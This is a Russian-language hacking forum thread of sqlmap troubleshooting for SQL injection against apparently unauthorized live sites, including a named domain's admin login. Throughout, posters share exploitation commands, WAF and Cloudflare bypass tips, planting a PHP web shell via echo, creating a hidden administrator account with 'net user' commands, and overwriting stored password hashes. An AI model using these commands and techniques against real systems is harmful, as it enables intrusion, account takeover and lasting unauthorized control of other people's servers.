[17:20:45] [ERROR] invalid character detected. retrying..

[17:20:45] [WARNING] increasing time delay to 4 seconds

[17:21:07] [ERROR] invalid character detected. retrying..

[17:21:07] [WARNING] increasing time delay to 5 seconds

[17:21:33] [ERROR] invalid character detected. retrying..

[17:21:33] [WARNING] increasing time delay to 6 seconds

[17:22:01] [ERROR] invalid character detected. retrying..

[17:22:01] [WARNING] increasing time delay to 7 seconds

[17:22:41] [ERROR] unable to properly validate last character value ('v')..

v

================================================== ==

[15:00:08] [WARNING] turning off pre-connect mechanism because of connection time out(s)

================================================== ==

[08:21:27] [INFO] resuming partial value: 0

[08:21:27] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)

[08:24:10] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)

================================================== ==

blackbox
15.12.2017, 17:16
Извините за глупый вопрос, но как называется темпер, который ключевые слова разделяет комментариями, типа SELECT - S/**/EL/**/EC/**/T и так далее, чтобы обойти харкдоженую проверку таких слов (движок их ищет в параметрах и отбрасывает). Спасибо.

t0ma5
15.12.2017, 17:27
blackbox said:
↑ (https://antichat.live/posts/4161266/)
Извините за глупый вопрос, но как называется темпер, который ключевые слова разделяет комментариями, типа SELECT - S/**/EL/**/EC/**/T и так далее, чтобы обойти харкдоженую проверку таких слов (движок их ищет в параметрах и отбрасывает). Спасибо.


такой запрос в оригинале не должен работать


Code:
> sel/**/ect 1;
ERROR 1064 (42000): You have an error in your SQL syntax;..

поиск по тамперам можно сделать так


Code:
sqlmapproject/tamper$ grep -rn '/\*\*/' .
./randomcomments.py:23: 'I/**/N/**/SERT'
./randomcomments.py:39: _ += "%s%s" % ("/**/" if randomRange(0, 1) else "", word[i])
./randomcomments.py:43: if "/**/" not in _:
./randomcomments.py:45: _ = word[:index] + "/**/" + word[index:]
./informationschemacomment.py:19: 'SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES'
./informationschemacomment.py:25: retVal = re.sub(r"(?i)(information_schema)\.", "\g/**/.", payload)
./space2comment.py:18: Replaces space character (' ') with comments '/**/'
./space2comment.py:30: 'SELECT/**/id/**/FROM/**/users'
./space2comment.py:43: retVal += "/**/"
./space2comment.py:53: retVal += "/**/"

хм есть тампер randomcomments, кажется тот случай

ShpillyWilly
20.12.2017, 03:44
Товарищи, подскажите пожалуйста...Берп нашел скулю(говорит, что Firm) в пост запросе, но не в параметрах, а в куках, отправляю запрос в SQLMapper, пытаюсь указать параметр руками через -p, но он даже не пробует его исследовать, шарить только по пост параметрам, в куки не лезет. Склмап вообще умеет такое? Спасибо


Code:
sqlmap -u 'http://domen/subscribe' --data='csrf_token=dd5ebc24c145e0d76f5a03c0bda6fd13&email=' --risk=3 -p '__sonar' --dbs --identify-waf --cookie='csrf_cookie=dd5ebc24c145e0d76f5a03c0bda6fd 13;PHPSESSID=lctkgerquk3cq59kdatu63v8g2;subscribe_ banner_3=closed;notification_reviews=1513720576;no tification_not_visited=1513720576;_ga=GA1.2.541204 179.1513699936;_gid=GA1.2.57135273.1513699936;__so nar=8822121954744852321;_ym_uid=151369993960937172 1;_ym_isad=2;d=45420;_gat=1;WhiteCallback_visitorI d=575190449'

t0ma5
20.12.2017, 14:04
ShpillyWilly said:
↑ (https://antichat.live/posts/4163242/)
Товарищи, подскажите пожалуйста...Берп нашел скулю(говорит, что
Firm
) в пост запросе, но не в параметрах, а в куках, отправляю запрос в SQLMapper, пытаюсь указать параметр руками через -p, но он даже не пробует его исследовать, шарить только по пост параметрам, в куки не лезет. Склмап вообще умеет такое? Спасибо


да умеет, выстави --level 3 и -v 3

grimnir
20.12.2017, 16:59
ShpillyWilly said:
↑ (https://antichat.live/posts/4163242/)
Товарищи, подскажите пожалуйста...Берп нашел скулю(говорит, что
Firm
) в пост запросе, но не в параметрах, а в куках, отправляю запрос в SQLMapper, пытаюсь указать параметр руками через -p, но он даже не пробует его исследовать, шарить только по пост параметрам, в куки не лезет. Склмап вообще умеет такое? Спасибо

Code:
sqlmap -u 'http://domen/subscribe' --data='csrf_token=dd5ebc24c145e0d76f5a03c0bda6fd13&email=' --risk=3 -p '__sonar' --dbs --identify-waf --cookie='csrf_cookie=dd5ebc24c145e0d76f5a03c0bda6fd 13;PHPSESSID=lctkgerquk3cq59kdatu63v8g2;subscribe_ banner_3=closed;notification_reviews=1513720576;no tification_not_visited=1513720576;_ga=GA1.2.541204 179.1513699936;_gid=GA1.2.57135273.1513699936;__so nar=8822121954744852321;_ym_uid=151369993960937172 1;_ym_isad=2;d=45420;_gat=1;WhiteCallback_visitorI d=575190449'



лучше полный запрос сохранять в name.txt с указанием __sonar=1*и раскручивать дальше -r "name.txt" пробовать разные варианты merge cookie Y/n

t0ma5
20.12.2017, 17:11
в принципе так тоже крутит


Code:
$ python sqlmap.py -u 'https://google.com' --data='csrf_token=dd5ebc24c145e0d76f5a03c0bda6fd13&email=' --risk=3 -p '__sonar' --dbs --identify-waf --cookie='csrf_cookie=dd5ebc24c145e0d76f5a03c0bda6fd 13;PHPSESSID=lctkgerquk3cq59kdatu63v8g2;subscribe_ banner_3=closed;notification_reviews=1513720576;no tification_not_visited=1513720576;_ga=GA1.2.541204 179.1513699936;_gid=GA1.2.57135273.1513699936;__so nar=8822121954744852321;_ym_uid=151369993960937172 1;_ym_isad=2;d=45420;_gat=1;WhiteCallback_visitorI d=575190449' --level 3 -v 3
.......
[16:10:01] [WARNING] heuristic (basic) test shows that Cookie parameter '__sonar' might not be injectable
[16:10:01] [PAYLOAD] 8822121954744852321'fOshsSZTLwWJ
[16:10:01] [DEBUG] got HTTP error code: 405 (Method Not Allowed)
[16:10:01] [INFO] testing for SQL injection on Cookie parameter '__sonar'
[16:10:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:10:01] [PAYLOAD] 8822121954744852321) AND 7339=3997-- JmzL
[16:10:01] [DEBUG] got HTTP error code: 405 (Method Not Allowed)
[16:10:01] [PAYLOAD] 8822121954744852321) AND 3724=3724-- YcXU
[16:10:01] [DEBUG] got HTTP error code: 405 (Method Not Allowed)

ShpillyWilly
20.12.2017, 17:25
всем, спасибо, буду пробовать, там еще сложность в том, что есть редирект и возникает еще 500 вариантов, мерджить куки или не мерджить, редиректиться или нет и тд.

Simcher
07.01.2018, 21:00
http://rgho.st/6jffGSX8B.view]http://rgho.st/6jffGSX8B/image.png

Что делать?В условие ставлю password='pass_hash' , когда ставлю другие колонки в условие, например Nick, то всё норм.

Sensoft
10.01.2018, 00:25
Как поменять через sqlmamp допустим пароль ? там стоит хешь а я хочу поставить свой хешь

Simcher
10.01.2018, 17:41
Sensoft said:
↑ (https://antichat.live/posts/4171228/)
Как поменять через sqlmamp допустим пароль ? там стоит хешь а я хочу поставить свой хешь


Sql запросом UPDATE, но только если есть права.

О привилегиях можно узнать командой --is-dba

Sensoft
11.01.2018, 07:03
Как залить shell


Code:
current user is DBA: True

команда --os-cmd –v l не помогает пробовал как по дефолту так и брутом директорию найти куда залить не помогло

ShpillyWilly
11.01.2018, 11:17
У меня похожая проблема, не могу залить шёл, подскажите куда ещё можно копнуть.

Есть доступ к pma, есть file_priv, есть раскрытые пути, есть доступ к файлам(через load_file) /etc/passwd и тд.

Into outfile работает в /var/tmp/ но в /var/www/html/ и дальше не работает

Есть креды к фтп, но сам сервер не але.

Есть доступ в админку, но там нет заливки файлов.

Заранее благодарю за помощь.

dmax0fw
11.01.2018, 14:24
ShpillyWilly said:
↑ (https://antichat.live/posts/4171734/)
У меня похожая проблема, не могу залить шёл, подскажите куда ещё можно копнуть.
Есть доступ к pma, есть file_priv, есть раскрытые пути, есть доступ к файлам(через load_file) /etc/passwd и тд.
Into outfile работает в /var/tmp/ но в /var/www/html/ и дальше не работает
Есть креды к фтп, но сам сервер не але.
Есть доступ в админку, но там нет заливки файлов.
Заранее благодарю за помощь.


ну если в /var/tmp/ пишет а в нужную нет, то очевидно что процессу мускула не хватает прав на запись в эту диру, скорее всего права там стоят 755 и владелец явно не mysql

ищи ту,на которой стоят 777

ShpillyWilly
11.01.2018, 14:58
dmax0fw said:
↑ (https://antichat.live/posts/4171825/)
ну если в /var/tmp/ пишет а в нужную нет, то очевидно что процессу мускула не хватает прав на запись в эту диру, скорее всего права там стоят 755 и владелец явно не mysql
ищи ту,на которой стоят 777


да, спасибо, я так и думал делать, но только я что-то не знаю, какими средствами найти такую папку в рамках /var/www/html/ . может есть какие-то стандартные или не стандартные вектора. пока мне на ум пришло только просканить все бурпом и сформировать список директорий, чтобы подсунуть в sqlmap для попытки залиться туда

dmax0fw
11.01.2018, 16:51
ShpillyWilly said:
↑ (https://antichat.live/posts/4171836/)
да, спасибо, я так и думал делать, но только я что-то не знаю, какими средствами найти такую папку в рамках /var/www/html/ . может есть какие-то стандартные или не стандартные вектора. пока мне на ум пришло только просканить все бурпом и сформировать список директорий, чтобы подсунуть в sqlmap для попытки залиться туда


частенько бывает когда выставляют 777 на директории по типу upload,images,tmp,cache и тд

смотри первым делом в эту сторону

ты говорил что есть полные пути и возможность чтения файлов - почитай исходники сайта, посмотри куда заливаются файлы, где хранится кеш

брутить список директорий это крайний вариант в данном случае

Siriak
13.01.2018, 13:42
Ребят подскажите как залить шелл на Windows Server 2005, пользователь sa, права true, через sqlmap выполнил --os-shell смотрю директории. Что делать дальше ума не приложу....

Siriak
13.01.2018, 14:45
BabaDook said:
↑ (https://antichat.live/posts/4172829/)
выполнять системные команды)))


ну я в принципе понял --os-cmd=? только толку, какие команды выполнить надо?)

dmax0fw
13.01.2018, 15:20
Siriak said:
↑ (https://antichat.live/posts/4172837/)
ну я в принципе понял --os-cmd=? только толку, какие команды выполнить надо?)




Code:
echo ^ > C:\path_to_document_root\shell.php

Siriak
13.01.2018, 17:09
dmax0fw said:
↑ (https://antichat.live/posts/4172844/)

Code:
echo ^ > C:\path_to_document_root\shell.php



пишет не удается найти указанный путь...

dmax0fw
13.01.2018, 17:14
Siriak said:
↑ (https://antichat.live/posts/4172892/)
пишет не удается найти указанный путь...


ну разумеется вместо C:\path_to_document_root\shell.php нужно указать путь до директории где лежат файлы сайта

Siriak
13.01.2018, 17:16
dmax0fw said:
↑ (https://antichat.live/posts/4172893/)
ну разумеется вместо C:\path_to_document_root\shell.php нужно указать путь до директории где лежат файлы сайта


так ясен пень что указываю свою директорию))

Siriak
13.01.2018, 17:18
BabaDook said:
↑ (https://antichat.live/posts/4172895/)
слушай, может это не твоё ?


ясн, раздел создан для вопросов. Я задал вопрос, не все такие гуру как ты.

dmax0fw
13.01.2018, 17:18
Siriak said:
↑ (https://antichat.live/posts/4172894/)
так ясен пень что указываю свою директорию))


попробуй для начала вывести


Code:
echo test > C:\путь\test.txt

Siriak
13.01.2018, 19:12
dmax0fw said:
↑ (https://antichat.live/posts/4172899/)
попробуй для начала вывести

Code:
echo test > C:\путь\test.txt



текстовый проливает и .aspx, но не php

Siriak
14.01.2018, 02:15
Спасибо ребят за подсказки, разобрался. BabaDook особенно спасибо что направил на путь истинный насчет net user /add , почитал инфу и разобрался.

Sensoft
14.01.2018, 02:36
Siriak said:
↑ (https://antichat.live/posts/4173108/)
Спасибо ребят за подсказки, разобрался. BabaDook особенно спасибо что направил на путь истинный насчет net user /add , почитал инфу и разобрался.


можно по подробней тоже интересно

Siriak
14.01.2018, 02:47
Sensoft said:
↑ (https://antichat.live/posts/4173110/)
можно по подробней тоже интересно


Все оказалась проще некуда, если у тебя права True

Через sqlmap прописал нового пользователя RDP командами

net user Admin Pass /add

net localgroup administrators Admin /add

Sensoft
14.01.2018, 02:53
Siriak said:
↑ (https://antichat.live/posts/4173112/)
Все оказалась проще некуда, если у тебя права True
Через sqlmap прописал нового пользователя RDP командами
net user Admin Pass /add
net localgroup administrators Admin /add


и ты типа можешь на сервер зайти ?

Siriak
14.01.2018, 02:59
Sensoft said:
↑ (https://antichat.live/posts/4173113/)
и ты типа можешь на сервер зайти ?


Конечно

ApTemkA
15.01.2018, 15:18
Получил данную уязвимость

http://i12.pixs.ru/storage/7/4/5/Screenshot_4496662_29005745.png

там оказалась одна БД, не считая information_schema, получил таблицы, с первой таблицы сделал дамп, всё ок, пробую другие и везде одно и то же:


Code:
[15:13:21] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[15:13:22] [WARNING] unable to retrieve the entries of columns 'name' for table 'Test' in database 'm12540_pc'

ShpillyWilly
16.01.2018, 03:55
как такое может быть, что руками работает самый примитивный запрос


HTML:
site.com/view.php?cid=1+union+select+1,2,3,4,5,6

, a sqlmap не видит в упор, даже если я ему подсовываю тип базы, кол-во столбиков для Union и левелриски? Подскажите, есть ли мысли..

erwerr2321
16.01.2018, 04:14
--headers="X-Requested-With: XMLHttpRequest" не?

ShpillyWilly
16.01.2018, 12:06
ms13 said:
↑ (https://antichat.live/posts/4173652/)
--headers="X-Requested-With: XMLHttpRequest" не?


Спасибо за предложение, но, что бы оно ни значило, результата это не дало, к сожалению.

erwerr2321
16.01.2018, 13:20
ShpillyWilly said:
↑ (https://antichat.live/posts/4173721/)
Спасибо за предложение, но, что бы оно ни значило, результата это не дало, к сожалению.


всё успешно отработало с данными параметрами

--random-agent --dbms=mysql --technique=u

Sensoft
17.01.2018, 12:00
В чём проблема не выводит BD


Code:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: address (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: address=if' RLIKE (SELECT (CASE WHEN (1726=1726) THEN 0x6966 ELSE 0x28 END)) AND 'yDAP'='yDAP
---
[10:58:47] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[10:58:47] [INFO] testing MySQL
[10:58:47] [INFO] confirming MySQL
[10:58:47] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 7.1.11
back-end DBMS: MySQL >= 5.0.0
[10:58:47] [INFO] fetching database names
[10:58:47] [INFO] fetching number of databases
[10:58:47] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[10:58:47] [INFO] retrieved:
[10:58:48] [WARNING] unexpected HTTP code '404' detected. Will use (extra) validation step in similar cases

[10:58:48] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[10:58:48] [ERROR] unable to retrieve the number of databases
[10:58:48] [INFO] falling back to current database
[10:58:48] [INFO] fetching current database
[10:58:48] [INFO] retrieved:
[10:58:49] [CRITICAL] unable to retrieve the database names
[10:58:49] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 6 times

erwerr2321
17.01.2018, 14:20
Sensoft said:
↑ (https://antichat.live/posts/4174104/)
В чём проблема не выводит BD

Вообще

[WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'


как бы намекает...

В твоём случае --no-cast

akv84
18.01.2018, 15:50
Добрый день,

Не могу получить дамп к нужной таблицы в SQLite:

команда: sqlmap -r request.txt -p Param --dbms=sqlite --force-ssl -D SQLite_db -T USERDB --dump

На выходе получаем:

[INFO] retrieved: CREATE TABLE USERDB ( OID

[WARNING] unable to enumerate the columns for table 'USERDB' in database 'SQLite_db'

Некоторые таблицы получаю без проблем в этой же базе.

BabaDook
18.01.2018, 15:55
akv84 said:
↑ (https://antichat.live/posts/4174525/)
Добрый день,
Не могу получить дамп к нужной таблицы в SQLite:
команда: sqlmap -r request.txt -p Param --dbms=sqlite --force-ssl -D SQLite_db -T USERDB --dump
На выходе получаем:
[INFO] retrieved: CREATE TABLE USERDB ( OID
[WARNING] unable to enumerate the columns for table 'USERDB' in database 'SQLite_db'
Некоторые таблицы получаю без проблем в этой же базе.


Может есть смысл не всю таблицу дампить, а определенные колонки например

t0ma5
18.01.2018, 16:09
в sqlite нет баз данных, там только таблицы, -D SQLite_db точно не нужно

akv84
18.01.2018, 19:07
BabaDook said:
↑ (https://antichat.live/posts/4174526/)
Может есть смысл не всю таблицу дампить, а определенные колонки например


Колонки не выводит, все тоже самое: "unable to enumerate the columns"


t0ma5 said:
↑ (https://antichat.live/posts/4174530/)
в sqlite нет баз данных, там только таблицы, -D SQLite_db точно не нужно


Спасибо!

BabaDook
19.01.2018, 03:05
t0ma5 said:
↑ (https://antichat.live/posts/4174530/)
в sqlite нет баз данных, там только таблицы, -D SQLite_db точно не нужно


Точно, точно. Не думал что sql крутит sqlite

Xsite
27.01.2018, 13:17
Подскажите есть решение траблы с клаудом? как я понимаю не крутится из-за него

[12:11:45] [WARNING] potential browser verification protection mechanism detected (CloudFlare)

[12:11:45] [WARNING] the web server responded with an HTTP error code (503) which could interfere with the results of the tests

dmax0fw
27.01.2018, 14:27
Xsite said:
↑ (https://antichat.live/posts/4177888/)
Подскажите есть решение траблы с клаудом? как я понимаю не крутится из-за него
[12:11:45] [WARNING] potential browser verification protection mechanism detected (CloudFlare)
[12:11:45] [WARNING] the web server responded with an HTTP error code (503) which could interfere with the results of the tests


попробуй вручную пройти верификацию в браузере, cloudflare присвоит тебе куки, затем передай эти куки в sqlmap

ekaterina333
27.01.2018, 14:33
dmax0fw said:
↑ (https://antichat.live/posts/4177913/)
попробуй вручную пройти верификацию в браузере, cloudflare присвоит тебе куки, затем передай эти куки в sqlmap


не поможет думаю там в другом проблема

ShpillyWilly
27.01.2018, 14:34
Xsite said:
↑ (https://antichat.live/posts/4177888/)
Подскажите есть решение траблы с клаудом? как я понимаю не крутится из-за него
[12:11:45] [WARNING] potential browser verification protection mechanism detected (CloudFlare)
[12:11:45] [WARNING] the web server responded with an HTTP error code (503) which could interfere with the results of the tests


попробуй узнать реальный ip и его уже дергать. /threads/realnyj-ip-za-cloud-flare-sokrytie-i-poisk.458593/ (https://antichat.live/threads/realnyj-ip-za-cloud-flare-sokrytie-i-poisk.458593/)

Xsite
27.01.2018, 15:27
ShpillyWilly said:
↑ (https://antichat.live/posts/4177920/)
попробуй узнать реальный ip и его уже дергать.
/threads/realnyj-ip-za-cloud-flare-sokrytie-i-poisk.458593/ (https://antichat.live/threads/realnyj-ip-za-cloud-flare-sokrytie-i-poisk.458593/)


первое что делал , пытался узнать айпи

но безрезультатно

Golfstream
27.01.2018, 23:26
[22:12:44] [WARNING] the web server responded with an HTTP error code (424) whic

h could interfere with the results of the tests

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: vote (POST)

Type: boolean-based blind

Title: OR boolean-based blind - WHERE or HAVING clause

Payload: wp-polls-nonce=08fc675d54&vote=-6688) OR 8053=8053-- GHAp&poll_3=8&

poll_3=9&poll_3=10&archive-dropdown=http://*****.**/2014/05/&poll_id=3 (http://*****.info/2014/05/&poll_id=3)

---

[22:12:44] [INFO] the back-end DBMS is Microsoft SQL Server

back-end DBMS: Microsoft SQL Server 2016

[22:12:44] [INFO] fetching database names

[22:12:44] [INFO] fetching number of databases

[22:12:46] [INFO] retrieved:

[22:12:46] [ERROR] unable to retrieve the number of databases

[22:12:46] [INFO] retrieving the length of query output

[22:12:46] [INFO] retrieved:

[22:12:47] [INFO] retrieved:

[22:12:47] [INFO] falling back to current database

[22:12:47] [INFO] fetching current database

[22:12:47] [INFO] retrieving the length of query output

[22:12:47] [INFO] retrieved:

[22:12:48] [INFO] retrieved:

[22:12:48] [CRITICAL] unable to retrieve the database names

[22:12:48] [WARNING] HTTP error codes detected during run:

424 (?) - 24 times

подскажите дальнейшие действия, может команды какойто не хватает? блокируется бд. Тамперы юзал, но толка нет

panic.ker
28.01.2018, 16:23
Включи -v 3 и --parse-errors, там смотри откуда ноги растут. Еще попробуй --no-cast или --hex, иногда прокатывает. Зачарить пробуй.

Sensoft
01.02.2018, 01:10
Нашёл слепую SQL injection на сайте но она в профиле аккаунта

Как мне прикрутить сесию или типа того ?

BabaDook
01.02.2018, 01:13
Sensoft said:
↑ (https://antichat.live/posts/4179591/)
Нашёл слепую SQL injection на сайте но она в профиле аккаунта
Как мне прикрутить сесию или типа того ?


куки задать не пробовал ? --cookie=".........."

Sensoft
01.02.2018, 01:17
BabaDook said:
↑ (https://antichat.live/posts/4179592/)
куки задать не пробовал ? --cookie=".........."


нет, но ща попробую

Sensoft
01.02.2018, 01:26
BabaDook said:
↑ (https://antichat.live/posts/4179592/)
куки задать не пробовал ? --cookie=".........."




Code:
sqlmap identified the following injection point(s) with a total of 147 HTTP(s) requests:
---
Parameter: industry (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: industry=-5813 OR 1546=1546
Vector: OR [INFERENCE]

базы не показало

и так же высветилась ошибка


Code:
[00:24:05] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system

Sensoft
01.02.2018, 01:28
BabaDook said:
↑ (https://antichat.live/posts/4179592/)
куки задать не пробовал ? --cookie=".........."


Так по ошибки он не понял вид BD у меня в приоретете стояла MySQL

я удалил преоритет сейчас глану ещё раз

erwerr2321
01.02.2018, 01:29
да, держи нас в курсе

Sensoft
01.02.2018, 01:32
ms13 said:
↑ (https://antichat.live/posts/4179598/)
да, держи нас в курсе


ок

The404
14.02.2018, 01:24
Всем привет!

Acunetix находит boolean-based blind

POST /admin/admin.php HTTP/1.1

Content-Length: 195

Content-Type: application/x-www-form-urlencoded

X-Requested-With: XMLHttpRequest

Referer: http://dsm-print.ru/

Cookie: SNS=8q3t6fosp0qb982nlqjkb8i3o2; PHPSESSID=2u4rtf0pji3cfe4bou3tnra5n7; _ym_uid=1518504918276952455;

_ym_isad=2; _ym_visorc_44242969=w

Host: dsm-print.ru

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0

Safari/537.21

Accept: */*

enter_admin=%c2%ee%e9%f2%e8&admin_name=if(now()=sysdate()%2csleep(0)%2c0)/*'XOR(if(now()=sysdate()%2csleep(0)%2c0))

OR'"XOR(if(now()=sysdate()%2csleep(0)%2c0))OR"*/&admin_password=g00dPa%24%24w0rD

помогите правильно составить запрос sqlmap и раскрутить эту шнягу - что не делаю modsecurity выдает - Error 415 Unsupported Media type

заранее благодарю....

BabaDook
14.02.2018, 01:30
The404 said:
↑ (https://antichat.live/posts/4183911/)
Всем привет!
Acunetix находит boolean-based blind
POST /admin/admin.php HTTP/1.1
Content-Length: 195
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer:
http://dsm-print.ru/
Cookie: SNS=8q3t6fosp0qb982nlqjkb8i3o2; PHPSESSID=2u4rtf0pji3cfe4bou3tnra5n7; _ym_uid=1518504918276952455;
_ym_isad=2; _ym_visorc_44242969=w
Host: dsm-print.ru
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0
Safari/537.21
Accept: */*
enter_admin=%c2%ee%e9%f2%e8&admin_name=if(now()=sysdate()%2csleep(0)%2c0)/*'XOR(if(now()=sysdate()%2csleep(0)%2c0))
OR'"XOR(if(now()=sysdate()%2csleep(0)%2c0))OR"*/&admin_password=g00dPa%24%24w0rD
помогите правильно составить запрос sqlmap и раскрутить эту шнягу - что не делаю modsecurity выдает - Error 415 Unsupported Media type
заранее благодарю....


Не хорошо по ру работать

sqlmap --random-agent -u 'http://dsm-print.ru/admin/admin.php' --data='enter_admin=&admin_name=*&admin_password=' --dbs --is-dba

__________________________________________________ ____________________

На счёт мод сека, тут надо уже ручками крутить ))

erwerr2321
14.02.2018, 01:52
BabaDook said:
↑ (https://antichat.live/posts/4183912/)
Не хорошо по ру работать


угу)


BabaDook said:
↑ (https://antichat.live/posts/4183912/)
На счёт мод сека, тут надо уже ручками крутить ))


Мирослав же вроде пилил modsecurityzeroversioned.py, не?

erwerr2321
14.02.2018, 02:02
BabaDook said:
↑ (https://antichat.live/posts/4183919/)
Да я не знаю, мне проще руками, sqlmap меня огорчил очень . он не делает то что нужно.


тож не знаю... то я загуглил.

Просто тема как бэ за его продукт - вот я и отписался, для тех пацанов, кто не в курсе!)

The404
14.02.2018, 03:13
BabaDook said:
↑ (https://antichat.live/posts/4183912/)
Не хорошо по ру работать
sqlmap --random-agent -u '
http://dsm-print.ru/admin/admin.php
' --data='enter_admin=&admin_name=*&admin_password=' --dbs --is-dba
__________________________________________________ ____________________
На счёт мод сека, тут надо уже ручками крутить ))


По RU -да не вреда ради - просто очень инфа нужна - тото я гляжу сдесь половина ветки RU скулями забита....

Запрос не помог - а так если что - извиняюсь...

Sensoft
01.03.2018, 06:08
Не как не могу раскрутить и за этого убогого WAF


Code:
[04:59:22] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests
[04:59:22] [WARNING] HTTP error codes detected during run:
400 (Bad Request) - 430 times, 414 (Request-URI Too Long) - 639 times
[04:59:22] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)

Помогите

cat1vo
01.03.2018, 06:34
Sensoft said:
↑ (https://antichat.live/posts/4188922/)
Не как не могу раскрутить и за этого убогого WAF

Code:
[04:59:22] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests
[04:59:22] [WARNING] HTTP error codes detected during run:
400 (Bad Request) - 430 times, 414 (Request-URI Too Long) - 639 times
[04:59:22] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)

Помогите


Тебе лучше в тему Ваши вопросы по уязвимостям (https://antichat.live/threads/vashi-voprosy-po-ujazvimostjam.424557/) обратиться с этим вопросом, информации которую ты предоставил мало, она не чем не поможет в решении проблемы.

Sensoft
01.03.2018, 08:52
cat1vo said:
↑ (https://antichat.live/posts/4188928/)
Тебе лучше в тему
Ваши вопросы по уязвимостям (https://antichat.live/threads/vashi-voprosy-po-ujazvimostjam.424557/)
обратиться с этим вопросом, информации которую ты предоставил мало, она не чем не поможет в решении проблемы.


Через sqlmap возможно клауд обойти ?

cat1vo
01.03.2018, 12:33
Sensoft said:
↑ (https://antichat.live/posts/4188954/)
Через sqlmap возможно клауд обойти ?


Waf от CloudFlare можно, он насколько я помню не сильно сложный!

Sensoft
01.03.2018, 13:00
cat1vo said:
↑ (https://antichat.live/posts/4189036/)
Waf от CloudFlare можно, он насколько я помню не сильно сложный!


я со скриптами пытался и не фига

Sensoft
05.03.2018, 19:43
Есть SQL injection

Права Tru

Как мне поменять хешь на всех акках сразу ? так вообще возможно ?

Или хотя бы на один из любых

dzhim2014
08.03.2018, 15:31
Siriak said:
↑ (https://antichat.live/posts/4173112/)
Все оказалась проще некуда, если у тебя права True
Через sqlmap прописал нового пользователя RDP командами
net user Admin Pass /add
net localgroup administrators Admin /add


хммм... очень интересно а как это заюзать? (если можно . то скрином покажите пожалуйста).

t0ma5
08.03.2018, 17:53
dzhim2014 said:
↑ (https://antichat.live/posts/4191119/)
хммм... очень интересно а как это заюзать? (если можно . то скрином покажите пожалуйста).

cat1vo
08.03.2018, 18:47
dzhim2014 said:
↑ (https://antichat.live/posts/4191119/)
хммм... очень интересно а как это заюзать? (если можно . то скрином покажите пожалуйста).


mssql xp_cmdshell (http://bfy.tw/H02G)

Muracha
14.03.2018, 21:09
Предполагаю на сайте POST sql-inj и хочу проверить нмапом.

Методом POST передаются следующие парметры


Code:
1312312312
Content-Type: text/plain; charset="utf-8"
Content-disposition: form-data; name="id"



Code:
1231212
Content-Type: text/plain; charset="utf-8"
Content-disposition: form-data; name="id2"



Code:
3312312
Content-Type: text/plain; charset="utf-8"
Content-disposition: form-data; name="id3"

Как указать нмапу, чтобы он пробовал раскрутить параметр id2?

BabaDook
14.03.2018, 21:11
Muracha said:
↑ (https://antichat.live/posts/4193366/)
Предполагаю на сайте POST sql-inj и хочу проверить нмапом.
Методом POST передаются следующие парметры

Code:
1312312312
Content-Type: text/plain; charset="utf-8"
Content-disposition: form-data; name="id"


Code:
1231212
Content-Type: text/plain; charset="utf-8"
Content-disposition: form-data; name="id2"


Code:
3312312
Content-Type: text/plain; charset="utf-8"
Content-disposition: form-data; name="id3"

Как указать нмапу, чтобы он пробовал раскрутить параметр id2?


-p id2

Muracha
14.03.2018, 21:23
BabaDook said:
↑ (https://antichat.live/posts/4193368/)
-p id2


Спасибо, но при запросе:


Code:
sqlmap\sqlmapproject-sqlmap-67f8c22\sqlmap.py -u "http://site.com/test.php" --method=POST --data="55" '-p=id' --dbs --random-agent

Мне выходит требование работать по GET несмотря на то, что я мне нужен POST запрос. Как это можно побороть?

Как можно


Code:
[CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')

RedFern.89
26.03.2018, 18:08
нашел акунетиксом слепую скулю в хедерсах, пытаюсь крутить через sqlmap командой


Code:
sqlmap.py -u "url" --headers="User-Agent:test*" --dbs

но сервер банит примерно через 5-6 запросов (появляется 521 ошибка от клауда)

пытался добавлять и time-sec и delay - не помогает. есть какие-то варианты обойти бан?

Matrix001
26.03.2018, 19:42
RedFern.89 said:
↑ (https://antichat.live/posts/4196910/)
нашел акунетиксом слепую скулю в хедерсах, пытаюсь крутить через sqlmap командой

Code:
sqlmap.py -u "url" --headers="User-Agent:test*" --dbs

но сервер банит примерно через 5-6 запросов (появляется 521 ошибка от клауда)
пытался добавлять и time-sec и delay - не помогает. есть какие-то варианты обойти бан?


Побробуй рандомный user-agent. Еще можешь попробоват через прокси. Но скорее всего Cloud не пропустит.

Sensoft
26.03.2018, 19:50
RedFern.89 said:
↑ (https://antichat.live/posts/4196910/)
нашел акунетиксом слепую скулю в хедерсах, пытаюсь крутить через sqlmap командой

Code:
sqlmap.py -u "url" --headers="User-Agent:test*" --dbs

